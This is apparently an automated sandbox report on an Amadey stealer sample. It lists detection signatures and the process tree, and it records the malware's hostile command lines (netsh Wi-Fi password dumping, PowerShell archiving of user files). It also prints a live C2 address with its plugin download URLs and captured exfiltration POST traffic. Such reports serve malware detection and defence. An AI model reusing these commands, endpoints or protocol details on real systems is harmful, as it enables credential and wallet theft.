Windows Analysis Report
SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe
Analysis ID: 1428513
MD5: 6afd3b5b7effe4bb0500fe08dd1f6ed7
SHA1: c0b8d6e8b660aa79851bd237c162ed437d3c047c
SHA256: 441adf73dcc0324843d1e42824e7e9473960c859c748a87ac7af4460535aaf2f
Tags: Amadey, exe
Infos:

Detection

Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadeys Clipper DLL
Yara detected Amadeys stealer DLL
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides threads from debuggers
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Uses netsh to modify the Windows network and firewall settings
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe (PID: 6484 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe" MD5: 6AFD3B5B7EFFE4BB0500FE08DD1F6ED7)
    • explorha.exe (PID: 1668 cmdline: "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe" MD5: 6AFD3B5B7EFFE4BB0500FE08DD1F6ED7)
  • explorha.exe (PID: 7068 cmdline: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe MD5: 6AFD3B5B7EFFE4BB0500FE08DD1F6ED7)
  • explorha.exe (PID: 5900 cmdline: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe MD5: 6AFD3B5B7EFFE4BB0500FE08DD1F6ED7)
    • rundll32.exe (PID: 4408 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 6960 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main MD5: EF3179D498793BF4234F708D3BE28633)
        • netsh.exe (PID: 1888 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • conhost.exe (PID: 2208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1244 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 6916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 6704 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Amadey | Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
{"C2 url": ["193.233.132.56/Pneh2sXQk0/index.php"]}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |

Source | Rule | Description | Author | Strings
0000000B.00000002.3040424811.000000006C981000.00000020.00000001.01000000.0000000B.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000000.00000003.1798578952.0000000005450000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000006.00000003.2311033083.00000000047E0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |

Source | Rule | Description | Author | Strings
11.2.rundll32.exe.6c980000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
11.2.rundll32.exe.6c980000.0.unpack | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security |
6.2.explorha.exe.860000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
2.2.explorha.exe.860000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
0.2.SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe.e10000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 6960, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 1244, ProcessName: powershell.exe
Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems), frack113: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 6960, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 1244, ProcessName: powershell.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 6960, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 1244, ProcessName: powershell.exe

Stealing of Sensitive Information

Source: Process started, Author: Joe Security: Data: Command: netsh wlan show profiles, CommandLine: netsh wlan show profiles, CommandLine|base64offset|contains: l, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 6960, ParentProcessName: rundll32.exe, ProcessCommandLine: netsh wlan show profiles, ProcessId: 1888, ProcessName: netsh.exe

Timestamp: 04/19/24-04:26:07.803129, SID: 2855239, Source Port: 49742, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 04/19/24-04:26:03.920797, SID: 2856147, Source Port: 49735, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 04/19/24-04:26:08.422562, SID: 2856151, Source Port: 49744, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected

AV Detection

Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe, Avira: detected
Source: http://pesterbdd.com/images/Pester.png, URL Reputation: Label: malware
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe, Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Avira: detection malicious, Label: TR/ClipBanker.pjgxt
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll, Avira: detection malicious, Label: TR/PSW.Agent.szlsq
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, Avira: detection malicious, Label: TR/ClipBanker.pjgxt
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Avira: detection malicious, Label: TR/PSW.Agent.szlsq
Source: 11.2.rundll32.exe.6c980000.0.unpack, Malware Configuration Extractor: Amadey {"C2 url": ["193.233.132.56/Pneh2sXQk0/index.php"]}
Source: http://193.233.132.56/Pneh2sXQk0/index.phpg, Virustotal: Detection: 5%
Source: http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dllv, Virustotal: Detection: 20%
Source: http://193.233.132.56/l, Virustotal: Detection: 18%
Source: http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dll, Virustotal: Detection: 20%
Source: http://193.233.132.56/Pneh2sXQk0/index.php, Virustotal: Detection: 20%
Source: http://193.233.132.56/Pneh2sXQk0/index.php3, Virustotal: Detection: 5%
Source: http://193.233.132.56/Pneh2sXQk0/Plugins/cred64.dll, Virustotal: Detection: 21%
Source: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1s, Virustotal: Detection: 19%
Source: http://193.233.132.56/, Virustotal: Detection: 19%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll, ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll, Virustotal: Detection: 78%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, Virustotal: Detection: 80%
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe, ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe, Virustotal: Detection: 54%
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Virustotal: Detection: 80%
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Virustotal: Detection: 78%
Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe, ReversingLabs: Detection: 44%
Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe, Virustotal: Detection: 54%
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe, Joe Sandbox ML: detected
Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe, Joe Sandbox ML: detected
Source: 11.2.rundll32.exe.6c980000.0.unpack, String decryptor: 193.233.132.56
Source: 11.2.rundll32.exe.6c980000.0.unpack, String decryptor: /Pneh2sXQk0/index.php
Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: cred64[1].dll.6.dr, cred64.dll.6.dr
Source: C:\Windows\System32\rundll32.exe, File opened: C:\Users\user
Source: C:\Windows\System32\rundll32.exe, File opened: C:\Users\user\OneDrive\desktop.ini
Source: C:\Windows\System32\rundll32.exe, File opened: C:\Users\user\AppData
Source: C:\Windows\System32\rundll32.exe, File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\rundll32.exe, File opened: C:\Users\user\Videos\desktop.ini
Source: C:\Windows\System32\rundll32.exe, File opened: C:\Users\user\Music\desktop.ini

Networking

Source: Traffic, Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.4:49735 -> 193.233.132.56:80
Source: Traffic, Snort IDS: 2855239 ETPRO TROJAN Win32/Amadey Stealer Activity M4 (POST) 192.168.2.4:49742 -> 193.233.132.56:80
Source: Traffic, Snort IDS: 2856151 ETPRO TROJAN Amadey CnC Activity M7 192.168.2.4:49744 -> 193.233.132.56:80
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 193.233.132.56 80
Source: Malware configuration extractor, IPs: 193.233.132.56
Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx/1.18.0 (Ubuntu); Date: Fri, 19 Apr 2024 02:26:04 GMT; Content-Type: application/octet-stream; Content-Length: 1285632; Last-Modified: Sun, 03 Mar 2024 11:54:33 GMT; Connection: keep-alive; ETag: "65e464f9-139e00"; Accept-Ranges: bytes
Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx/1.18.0 (Ubuntu); Date: Fri, 19 Apr 2024 02:26:07 GMT; Content-Type: application/octet-stream; Content-Length: 112128; Last-Modified: Sun, 03 Mar 2024 11:54:32 GMT; Connection: keep-alive; ETag: "65e464f8-1b600"; Accept-Ranges: bytes
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: GET /Pneh2sXQk0/Plugins/cred64.dll HTTP/1.1Host: 193.233.132.56
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: GET /Pneh2sXQk0/Plugins/clip64.dll HTTP/1.1Host: 193.233.132.56
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php?wal=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----NjE0MA==Host: 193.233.132.56Content-Length: 6300Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
